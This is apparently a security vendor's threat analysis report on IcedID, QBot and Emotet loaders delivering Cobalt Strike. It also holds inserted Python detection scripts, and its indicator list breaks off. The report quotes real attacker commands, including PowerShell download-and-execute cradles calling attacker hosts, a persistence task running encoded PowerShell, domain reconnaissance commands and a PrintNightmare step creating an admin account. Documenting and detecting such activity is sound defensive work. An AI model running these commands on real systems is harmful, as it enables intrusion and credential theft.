# THREAT ANALYSIS REPORT: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot

**[cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot)**

Written By Cybereason Global SOC Team

February 10, 2022 | 13 minute read

[The Cybereason Global Security Operations Center Team (GSOC)](https://www.cybereason.com/blog/authors/cybereason-global-soc-team) issues Cybereason Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving malicious actors used the malware loaders [IcedID](https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware), [QBot](https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike), and [Emotet](https://www.cybereason.com/blog/threat-alert-the-return-of-emotet) to deploy the Cobalt Strike framework on the compromised systems. The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s high damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the [Conti ransomware group](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware).

## Key Points

- **Fast-moving adversaries:** The threat actors conducted malicious activities in the compromised systems only approximately 8 minutes after infecting the systems with the malware loader IcedID, QBot, or Emotet. The malicious actors deployed Cobalt Strike up to approximately 2 hours after accessing the compromised systems.
- **Targeted phishing emails:** Malicious actors, who we attribute as affiliates of the [Conti ransomware group](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware), specifically targeted a user by sending the user an email with an attachment (an Excel document) that was almost identical to a legitimate email and email attachment already distributed to other users within the organization. The difference was that the attached Excel document contained a malicious macro that distributed IcedID.
- **Detected and prevented:** The [Cybereason XDR Platform](https://www.cybereason.com/platform) effectively detects and prevents the IcedID, QBot, and Emotet malware.
- **Cybereason Managed Detection and Response (MDR):** The Cybereason GSOC has zero tolerance towards attacks that involve malware loaders, such as IcedID, QBot, and Emotet, and categorizes such attacks as critical, high-severity incidents. The [Cybereason GSOC MDR Team](https://www.cybereason.com/services/managed-detection-response-mdr) issues a comprehensive report to customers when such an incident occurs. The report provides an in-depth overview of the incident, which helps scope the extent of compromise and the impact on the customer’s environment. In addition, the report provides attribution information when possible as well as recommendations for mitigating and isolating the threat.

## Introduction

[Cobalt Strike](https://www.cobaltstrike.com/) is an adversary simulation framework with the primary use case of assisting red team operations. However, Cobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a [modular framework with an extensive set of features that are useful to malicious actors](https://www.mandiant.com/resources/defining-cobalt-strike-components#:~:text=Cobalt%20Strike%20is%20a%20commercial,Advanced%20Persistent%20Threats%20(APTs).), such as command execution, process injection, and credential theft.
The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once Cobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to other threat actors, including ransomware group affiliates.

In the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack scenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems (i.e., malware loaders) to deploy Cobalt Strike on the systems. In this article, we present the activities of the malware loaders and of the malicious actors that operated the loaders in three selected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the deployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group.

Malicious actors use the IcedID malware to distribute various types of malware, including [ransomware](https://www.cybereason.com/fundamentals/what-is-ransomware), to compromised systems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in phishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as reconnaissance and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt Strike on compromised systems.

QBot, also known as Qakbot, is a malware that has been present on the threat landscape since 2007. QBot originally featured information stealing and trojan functionalities; however, the malicious actors that develop QBot have extended the malware with malware loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious attachments in phishing emails.
QBot downloads and executes additional malware on compromised machines, such as the Cobalt Strike framework, and ransomware, such as [REvil](https://www.cybereason.com/blog/cybereason-vs.-revil-ransomware) and [ProLock](https://www.cybereason.com/blog/three-reasons-why-you-should-never-pay-ransomware-attackers).

Since security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking Trojan into a malware loader. Over the last few years, before authorities [disrupted the infrastructure of Emotet operators](https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action) as part of a global operation in the first quarter of 2021, malicious actors had been using Emotet to deliver the Ryuk ransomware to compromised systems. [On November 15, 2021, security researchers announced the discovery of a new variant of Emotet on the threat landscape](https://twitter.com/gdata_adan/status/1460298879090503681). [The Cybereason GSOC team observed attack scenarios that involved the new Emotet malware shortly thereafter](https://www.cybereason.com/blog/threat-alert-the-return-of-emotet), in which Emotet deployed Cobalt Strike on compromised systems.

## Analysis

### From IcedID to Cobalt Strike: Conti Ransomware Affiliates

The figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this scenario, the malicious actors, who we attribute as affiliates of the [Conti ransomware group](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware), specifically targeted a user by sending the user an email with an attachment (an Excel document) that is almost identical to a legitimate email and email attachment already distributed to other users within the organization. The difference was that the attached Excel document contained a malicious macro.
This indicates a potential long-term presence of the actors in the environment:

_An infection using the IcedID malware_

When the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an attacker-controlled endpoint and then executed the file. The macro downloaded the IcedID executable to the home directory of the user, such as `C:\Users\test\javabridge64.exe`, where `javabridge64.exe` is the name of the IcedID executable and `C:\Users\test` is the home directory of the user `test`:

_Malicious Office macro executes IcedID javabridge64.exe as seen in the Cybereason XDR Platform_

Approximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the [SysInfo IcedID command](https://www.binarydefense.com/icedid-gziploader-analysis/) to enumerate relevant system information, such as active processes, and to conduct the following reconnaissance activities:

- IcedID executed the following command to retrieve a list of the security solutions that are installed on the compromised system: `wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List`
- IcedID executed the command `ipconfig /all` to retrieve the networking configuration of the compromised system.
- IcedID executed the `systeminfo.exe` Windows utility to retrieve detailed information about the compromised system, such as operating system version and hardware configuration.
- IcedID executed the following commands to retrieve Active Directory (AD)-related information:

```
net view /all
net view /all /domain
net config workstation
net group "Domain Admins" /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts
```

_IcedID reconnaissance activities as seen in the Cybereason XDR Platform_

Approximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the [ExecAdmin IcedID command](https://www.binarydefense.com/icedid-gziploader-analysis/), which attempts to elevate user privileges using a known Windows User Account Control (UAC) bypass that leverages the fodhelper Windows utility. After approximately 5 minutes, the malicious actors executed the [Exec IcedID command](https://www.binarydefense.com/icedid-gziploader-analysis/) to execute code by injecting the code into a cmd.exe instance.

Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the command `rundll32 adobe.dll,kasim` (where `kasim` is a dynamic-link library (DLL) entry point):

_Execution of Cobalt Strike loader as seen in the Cybereason XDR Platform_

A few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the attacker-controlled endpoint with the IP address 185.70.184[.]8 by executing the PowerShell command `IEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a'))`.

This attributes the actors as Conti affiliates, since [the Conti group operated the endpoint with the IP address 185.70.184[.]8](https://twitter.com/AltShiftPrtScn/status/1467323259137974273) in the week when the attack that we discussed took place. In addition, the security community has [observed Conti affiliates using the IcedID malware to deploy Cobalt Strike on compromised systems](https://thedfirreport.com/2021/05/12/conti-ransomware/).

To deploy the IcedID malware, the Conti affiliates targeted a particular user.
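The reconnaissance burst above (AV enumeration, `ipconfig /all`, `systeminfo`, `net`, `nltest`, all within seconds of each other) is a far stronger signal than any single command. The following is an added detection example, not Cybereason code: it assumes process-creation events with the fields `ts`, `ppid`, `parent` and `cmdline`, assumes the discovery commands are spawned by the IcedID process, and feeds it events constructed from the commands listed in this report rather than real telemetry.

```python
"""Flag an IcedID-style discovery burst in process-creation telemetry.

Added example for this report, not Cybereason code. The event fields and the
assumption that IcedID is the parent of the discovery commands are assumptions;
the events below are constructed from the commands the report lists."""
import re
from datetime import datetime, timedelta

# Discovery commands the report attributes to IcedID's SysInfo stage.
DISCOVERY_PATTERNS = [
    ("av_enum", re.compile(r"\bwmic\b.*securitycenter2.*antivirusproduct", re.I)),
    ("ipconfig", re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I)),
    ("systeminfo", re.compile(r"\bsysteminfo(\.exe)?\b", re.I)),
    ("net_view", re.compile(r"\bnet1?(\.exe)?\s+view\b", re.I)),
    ("net_config", re.compile(r"\bnet1?(\.exe)?\s+config\s+workstation\b", re.I)),
    ("domain_admins", re.compile(r'\bnet1?(\.exe)?\s+group\s+"?domain admins"?.*/domain', re.I)),
    ("nltest_trusts", re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I)),
]

def classify(cmdline):
    """Return the discovery category of a command line, or None."""
    for label, pat in DISCOVERY_PATTERNS:
        if pat.search(cmdline):
            return label
    return None

def find_recon_bursts(events, window=timedelta(minutes=5), min_distinct=4):
    """Group discovery commands by parent PID and alert on any parent that runs
    at least `min_distinct` different categories within `window`. A lone admin
    'ipconfig /all' never reaches the threshold; the burst in the report does."""
    by_parent = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev["cmdline"])
        if label:
            by_parent.setdefault(ev["ppid"], []).append((ev["ts"], label, ev["parent"]))
    alerts = []
    for ppid, hits in by_parent.items():
        for i, (start, _, parent) in enumerate(hits):
            labels = {lbl for ts, lbl, _ in hits[i:] if ts - start <= window}
            if len(labels) >= min_distinct:
                alerts.append({"ppid": ppid, "parent": parent, "first_seen": start,
                               "categories": sorted(labels)})
                break  # one alert per parent process
    return alerts

_T0 = datetime(2022, 1, 10, 9, 8, 0)  # constructed timestamp
_ICEDID = {"ppid": 4120, "parent": "javabridge64.exe"}  # assumed parent process
SAMPLE_EVENTS = [  # constructed from the commands the report lists
    dict(_ICEDID, ts=_T0, cmdline=r"wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"),
    dict(_ICEDID, ts=_T0 + timedelta(seconds=3), cmdline="ipconfig /all"),
    dict(_ICEDID, ts=_T0 + timedelta(seconds=5), cmdline="systeminfo.exe"),
    dict(_ICEDID, ts=_T0 + timedelta(seconds=9), cmdline="net view /all /domain"),
    dict(_ICEDID, ts=_T0 + timedelta(seconds=12), cmdline='net group "Domain Admins" /domain'),
    dict(_ICEDID, ts=_T0 + timedelta(seconds=15), cmdline="nltest /domain_trusts /all_trusts"),
    # benign: a help-desk session running one discovery command from cmd.exe
    {"ts": _T0 + timedelta(minutes=2), "ppid": 5000, "parent": "cmd.exe", "cmdline": "ipconfig /all"},
]

if __name__ == "__main__":
    for alert in find_recon_bursts(SAMPLE_EVENTS):
        print(alert)
```

Tune `window` and `min_distinct` to the environment; the parent-process grouping is what separates a loader's burst from an administrator's unrelated commands.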
At a larger scale, in the middle of 2021, we observed malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign, which we discuss in the following section.

**Stolen Images Evidence Campaign**

This [“stolen images evidence” campaign](https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/) involved phishing emails that legitimate organization contact forms had generated and sent to the targeted users (the contact form recipients). The emails contained legal threats related to copyright infringement due to the use of copyright-protected images that the targeted user had apparently stolen. The emails urged the recipient to sign in to a Google page that supposedly listed the images. After the user signed in to the page using valid Google credentials, the page downloaded and executed a malicious JavaScript (.js) script using the Windows wscript utility. The script executed a Base64-encoded PowerShell command to download and execute the IcedID malware, for example:

`IEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php')`

The execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry point, such as:

`rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer`

This DLL conducted the first stage of the deployment of the IcedID malware, and we refer to it as the first-stage IcedID DLL:

_Download and execution of first-stage IcedID DLL as seen in the Cybereason XDR Platform_

The first-stage DLL gathered information about the compromised machine, such as hardware and operating system information, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was encrypted using a symmetric encryption key.
The first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that typically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s `%LocalAppData%` directory, such as `C:\Users\user\AppData\Local\Temp\rebuildx32.tmp`, and the license.dat file in the user’s `%AppData%` directory. The first-stage IcedID DLL then executed the DLL file, such as:

`rundll32.exe "C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update /i:"ApproveFinish\license.dat"`

We refer to this DLL as the second-stage IcedID DLL. The main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. license.dat contained encrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat and executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe:

_Second-stage IcedID DLL injects IcedID into chrome.exe as seen in the Cybereason XDR Platform_

### From QBot to Cobalt Strike

The figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike:

_An infection using the QBot malware_

Malicious actors distribute QBot as attachments, typically Microsoft Office Excel documents, to phishing emails. The Office Excel application prompts the user that has opened the document that distributes QBot to enable Office macro execution. When the Office macro executes, the macro first downloads the QBot malware from an attacker-controlled endpoint and then executes the malware. In the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the `%ProgramData%` directory, such as `C:\ProgramData`, with the filename extension .ocx, for example Volet1.ocx (other names include Volet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows utility.
The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities. In addition, the DLL injected stager_1.dll into a legitimate Windows process, msra.exe:

_Office Excel macro executes QBot as seen in the Cybereason XDR Platform_

Approximately 6 minutes after injecting stager_1.dll into msra.exe, QBot conducted reconnaissance activities by executing the commands [net](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/net-commands-on-operating-systems), [arp](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/arp), [ipconfig](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig), [netstat](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat), [nslookup](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup), [route](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/route_ws2008), and [whoami](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami). The figure below depicts the execution of these commands, including command line parameters:

_QBot reconnaissance activities as seen in the Cybereason XDR Platform_

Approximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised system by executing the following command:

```
schtasks.exe /Create /F /TN "{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Cvdijvkees).omowidpdnpcwb))) " /SC MINUTE /MO 30
```

This command creates a scheduled task named `{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}` that periodically executes Base64-encoded PowerShell code stored in the registry key `HKEY_CURRENT_USER\SOFTWARE\Cvdijvkees`.

Approximately 48 minutes after creating the scheduled task, QBot injected [Rubeus](https://github.com/GhostPack/Rubeus), a tool for attacking Kerberos deployments, into the legitimate Windows Update process wuauclt.exe. After approximately 18 minutes, QBot stole web browser data, such as cookies and browsing history, using the recovery functionality of the [esentutl](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875546(v=ws.11)) Windows utility.
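The persistence command above has a recognisable shape: a GUID-named task that fires every few minutes and whose action wraps `powershell.exe` in `cmd /c`, decodes Base64 read from a registry value, and hands it to `IEX`. The following parser is an added example, not Cybereason code; the first sample is the command quoted in this report (registry key and value name as observed), while the benign sample, the field names and the verdict logic are assumptions.

```python
"""Parse a schtasks /Create command line and flag the QBot persistence pattern
described in this report: a minute-interval task whose action runs powershell
IEX over Base64 data read from a registry value.

Added example, not Cybereason code. Field names and scoring are assumptions."""
import re

TASK_NAME_RE = re.compile(r'/TN\s+(?:"([^"]+)"|(\S+))', re.I)
# Greedy: the action itself may contain escaped quotes (\"\") as in the report.
ACTION_RE = re.compile(r'/TR\s+"(.*)"\s+/SC\b', re.I | re.S)
SCHEDULE_RE = re.compile(r"/SC\s+(\w+)", re.I)
MODIFIER_RE = re.compile(r"/MO\s+(\d+)", re.I)
# (Get-ItemProperty -Path HKCU:\SOFTWARE\<key>).<value>
REG_READ_RE = re.compile(r"Get-ItemProperty\s+-Path\s+(HK\w+:\\[^\s)]+)\)\.(\w+)", re.I)
GUID_RE = re.compile(r"\{[0-9A-Z]{8}(-[0-9A-Z]{4}){3}-[0-9A-Z]{12}\}", re.I)

def parse_schtasks(cmdline):
    """Return None unless cmdline is a schtasks /Create; else a dict with the
    task name, action, schedule, interval, registry read (if any) and verdict."""
    if not re.search(r"\bschtasks(\.exe)?\b.*\s/Create\b", cmdline, re.I):
        return None
    tn = TASK_NAME_RE.search(cmdline)
    task_name = (tn.group(1) or tn.group(2)) if tn else None
    tr = ACTION_RE.search(cmdline) or re.search(r"/TR\s+(\S+)", cmdline, re.I)
    action = tr.group(1).strip() if tr else ""
    sc = SCHEDULE_RE.search(cmdline)
    mo = MODIFIER_RE.search(cmdline)
    reg = REG_READ_RE.search(action)
    indicators = {
        "powershell": bool(re.search(r"\bpowershell(\.exe)?\b", action, re.I)),
        "iex": bool(re.search(r"\b(IEX|Invoke-Expression)\b", action, re.I)),
        "base64": "frombase64string" in action.lower(),
        "registry_payload": reg is not None,
        "guid_task_name": bool(task_name and GUID_RE.fullmatch(task_name)),
    }
    # Verdict: code pulled from the registry (or Base64) and run through IEX is
    # the QBot shape; a scheduled powershell.exe on its own is not enough.
    suspicious = indicators["iex"] and (indicators["base64"] or indicators["registry_payload"])
    return {
        "task_name": task_name,
        "action": action,
        "schedule": sc.group(1).upper() if sc else None,
        "interval": int(mo.group(1)) if mo else None,
        "registry_key": reg.group(1) if reg else None,
        "registry_value": reg.group(2) if reg else None,
        "indicators": indicators,
        "suspicious": suspicious,
    }

# Command line quoted in the report (copied, not constructed)
QBOT_SCHTASKS = (
    'schtasks.exe /Create /F /TN "{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}" '
    '/TR "cmd /c start /min \\"\\" powershell.exe -Command '
    "IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    '(Get-ItemProperty -Path HKCU:\\SOFTWARE\\Cvdijvkees).omowidpdnpcwb))) " /SC MINUTE /MO 30'
)
# Constructed benign task for comparison
BENIGN_SCHTASKS = 'schtasks.exe /Create /TN "Nightly Backup" /TR "C:\\Tools\\backup.exe /full" /SC DAILY /ST 02:00'

if __name__ == "__main__":
    for cmd in (QBOT_SCHTASKS, BENIGN_SCHTASKS):
        print(parse_schtasks(cmd))
```

The extracted `registry_key` and `registry_value` are what a responder needs next: export that value, Base64-decode it, and review the PowerShell it contains before deleting the task and the key.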
After approximately 2 minutes, QBot attempted to exploit the [PrintNightmare vulnerability](https://www.cybereason.com/blog/threat-alert-printnightmare-critical-vulnerability-in-windows-print-spooler) by executing the `Invoke-Nightmare` PowerShell command to create an administrative user with the username admin1 and the password Password. After approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attacker-controlled endpoints known to be associated with Cobalt Strike at the time the attack took place:

_QBot uses the esentutl Windows utility to steal web browser data as seen in the Cybereason XDR Platform_

_QBot injects Rubeus into wuauclt.exe and executes Invoke-Nightmare as seen in the Cybereason XDR Platform_

### From Emotet to Cobalt Strike

The figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike:

_An infection using the Emotet malware_

Malicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails. In addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files that store Office documents, and Universal Windows Application installation packages that download and execute Emotet when a user executes the installation package:

_Phishing email with attached Microsoft Word document that distributes Emotet_

**Distribution: Office Word Document**

If an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the document to enable Office macro execution:

_Office Word application prompts a user to enable macro execution_

When the user enables macro execution, a malicious Office macro that is part of the Word document and that distributes Emotet executes.
The macro first deobfuscates macro code by removing character arrays, such as Cew (see the figure below), and then executes the deobfuscated macro code:

_Implementation of a malicious macro that distributes Emotet_

The deobfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the `%ProgramData%` directory, such as `C:\ProgramData`. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores under a random filename in the `%ProgramData%` directory. The PowerShell code then uses the rundll32 Windows utility to execute Emotet:

_Deobfuscated macro code executes PowerShell that downloads and executes Emotet as seen in the Cybereason XDR Platform_

Alternatively to executing the PowerShell code directly, the deobfuscated macro code may first create a Windows Batch (.bat) file in the `%ProgramData%` directory under a random name, such as `C:\ProgramData\sdfhiuwu.bat` or `yksds.bat`, and then execute the file. The .bat file stores obfuscated code that includes Base64-encoded code and code that is stored in multiple string variables. The obfuscated code in the .bat file executes the PowerShell code that downloads Emotet and then uses the rundll32 Windows utility to execute it:

_Deobfuscated macro code creates a Windows Batch file_

_A Windows Batch (.bat) file that contains obfuscated code_

_Execution of .bat file (yksds.bat) that executes PowerShell code which downloads and executes Emotet as seen in the Cybereason XDR Platform_

The PowerShell code uses the [rundll32](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32) Windows utility and specifies the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the [internal name](https://docs.microsoft.com/en-us/windows/win32/menurc/versioninfo-resource) of X.dll:

_rundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform_

_rundll32 maps an Emotet DLL file under the internal name of X.dll as seen in the Cybereason XDR Platform_

**Distribution: Office Excel Document**

If an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document to enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office macros that distribute Emotet. When the user enables macro execution, the Office macros execute:

_Office Excel application prompts a user to enable macro execution_

The macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the extension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx. The macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (&) character to individual characters of the name:

_rundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform_

**Malicious Activities**

When Emotet executes on a compromised system, the malware first establishes persistence by creating system services that start at system startup or by creating registry values at the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` registry key:

_Emotet (DLL file: oxneternhgbtah.ybc) establishes persistence on compromised system as seen in the Cybereason XDR Platform_

Emotet then executes processes that conduct malicious activities.
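Every loader in this report reaches execution through rundll32 or regsvr32: the IcedID first stage (`VhfNmz.dat,DllRegisterServer`) and second stage (`rebuildx32.tmp,update`), the QBot .ocx registered with regsvr32, and the Emotet .ocx or random-name DLL run through DllRegisterServer or Control_RunDLL, sometimes with an ampersand-interleaved entry-point name. The normaliser below is an added example, not Cybereason code, serving the IcedID, QBot and Emotet sections alike; the finding names and path heuristics are assumptions, the QBot, Emotet-obfuscation and benign sample command lines are constructed from the descriptions, and the remaining samples are the command lines quoted in the report.

```python
"""Normalise rundll32/regsvr32 command lines and flag the proxy-execution
patterns this report describes (IcedID .dat/.tmp stages, QBot .ocx via
regsvr32, Emotet DLLs via DllRegisterServer/Control_RunDLL, '&'-obfuscated
entry points).

Added example, not Cybereason code. Findings and path heuristics are assumptions."""
import re

LOADER_ENTRY_POINTS = {"dllregisterserver", "control_rundll"}
PROGRAM_RE = re.compile(r'^\s*"?(?:[^"\s]*[\\/])?(rundll32|regsvr32)(?:\.exe)?"?\s+(.*)$', re.I)
RUNDLL_ARGS_RE = re.compile(r'^(?:"([^"]+)"|([^\s,]+))(?:,(\S+))?\s*(.*)$')
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')

def parse_proxy_exec(cmdline):
    """Return None if cmdline is not rundll32/regsvr32, else a dict with the
    module, de-obfuscated entry point, remaining args, findings and verdict."""
    m = PROGRAM_RE.match(cmdline)
    if not m:
        return None
    program, rest = m.group(1).lower(), m.group(2)
    if program == "rundll32":
        a = RUNDLL_ARGS_RE.match(rest)
        module = a.group(1) or a.group(2) or ""
        raw_entry, args = a.group(3) or "", a.group(4)
    else:
        # regsvr32: the module is the last non-switch token; registration calls
        # DllRegisterServer (simplification: /i and /n variants are ignored).
        tokens = [q or t for q, t in TOKEN_RE.findall(rest)]
        module = next((t for t in reversed(tokens) if not t.startswith("/")), "")
        raw_entry, args = "DllRegisterServer", ""
    entry = raw_entry.replace("&", "")  # undo D&l&l&R&e&g... style obfuscation
    findings = []
    if "&" in raw_entry:
        findings.append("obfuscated_entry_point")
    if entry.lower() in LOADER_ENTRY_POINTS:
        findings.append("loader_entry_point")  # informational: also legitimate
    ext = module.rsplit(".", 1)[-1].lower() if "." in module else ""
    if ext and ext != "dll":
        findings.append("non_dll_extension")  # .ocx, .dat, .tmp, .ybc ...
    if re.search(r"\\(programdata|appdata|users)\\", module, re.I):
        findings.append("user_writable_path")
    if "\\" not in module:
        findings.append("relative_module_path")  # informational: check the parent
    suspicious = bool({"obfuscated_entry_point", "non_dll_extension",
                       "user_writable_path"} & set(findings))
    return {"program": program, "module": module, "entry_point": entry,
            "args": args.strip(), "findings": findings, "suspicious": suspicious}

SAMPLES = {
    # quoted in the report
    "icedid_stage1": r"rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer",
    "icedid_stage2": r'rundll32.exe "C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update /i:"ApproveFinish\license.dat"',
    "cobalt_loader": r"rundll32 adobe.dll,kasim",
    # constructed from the report's descriptions (switches and obfuscation are assumptions)
    "qbot_ocx": r"regsvr32 /s C:\ProgramData\Volet1.ocx",
    "emotet_obf": r"rundll32.exe C:\ProgramData\besta.ocx,D&l&l&R&e&g&i&s&t&e&r&S&e&r&v&e&r",
    # constructed benign Control Panel invocation
    "benign_cpl": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
}

def scan(samples):
    """Run the parser over a name -> command line mapping."""
    return {name: parse_proxy_exec(cmd) for name, cmd in samples.items()}

if __name__ == "__main__":
    for name, result in scan(SAMPLES).items():
        print(name, result["suspicious"], result["findings"])
```

The Cobalt Strike loader (`adobe.dll,kasim`) deliberately stays informational here, because a bare module name with an unusual export looks the same as many legitimate Control Panel calls; what made it malicious in the report was its parent, the IcedID process, so pair this parser with parent-process context.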
The processes that Emotet executes have random names and are child processes of the rundll32 process that executes Emotet. In the attack scenario that we analyzed, Emotet executed a process that steals cookies or web and email credentials from client credential databases. Emotet used the keyword scomma in the process command line to execute [WebBrowserPassView](https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-exploring-emotet-elaborate-everyday-enigma/), a tool that steals web credentials from browser credential databases. Emotet then exfiltrated data from the compromised system to attacker-controlled endpoints:

_Emotet executes processes that conduct malicious activities as seen in the Cybereason XDR Platform_

_Emotet executes the WebBrowserPassView tool as seen in the Cybereason XDR Platform_

_Emotet exfiltrates data as seen in the Cybereason XDR Platform_

After Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system.
Emotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the DllRegisterServer DLL entry point.

## Detection and Prevention

### Cybereason XDR Platform

The [Cybereason XDR Platform](https://www.cybereason.com/platform) is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection that detects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities:

_Cybereason XDR Platform detects IcedID injecting code into a cmd.exe instance_

_Cybereason XDR Platform detects IcedID executing a Cobalt Strike loader implemented in adobe.dll_

_Cybereason XDR Platform detects a malicious Office macro executing QBot using the regsvr32 Windows utility_

_Cybereason XDR Platform detects a malicious Office Excel document that distributes Emotet_

### Cybereason GSOC MDR

The Cybereason GSOC recommends the following:

- [Enable the Anti-Malware feature in the Cybereason NGAV module and enable the Detect and Prevent modes](https://nest.cybereason.com/documentation/product-documentation/190/anti-malware-settings) of this feature.
- Securely handle email messages that originate from external sources. This includes disabling hyperlinks and investigating the content of email messages to identify phishing attempts.
- Threat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for detecting specific threats. To find out more about threat hunting and Managed Detection and Response with the Cybereason Defense Platform, [contact a Cybereason Defender here](https://www.cybereason.com/services/managed-detection-response-mdr#form).
- For Cybereason customers: [More details are available on the NEST](https://nest.cybereason.com/knowledgebase/5191271), including custom threat hunting queries for detecting this threat.

Cybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to everywhere. [Schedule a demo today](https://www.cybereason.com/request-a-demo) to learn how your organization can benefit from an operation-centric approach to security.

## Indicators of Compromise

**Executables**

- SHA-1 hash: `a4d415c07b4ff77c6bd792c32fc46bfc6a1b0354`
- SHA-1 hash: `e8992a283f9f37dec617b305db2790d9112d3a20`

**Domains**

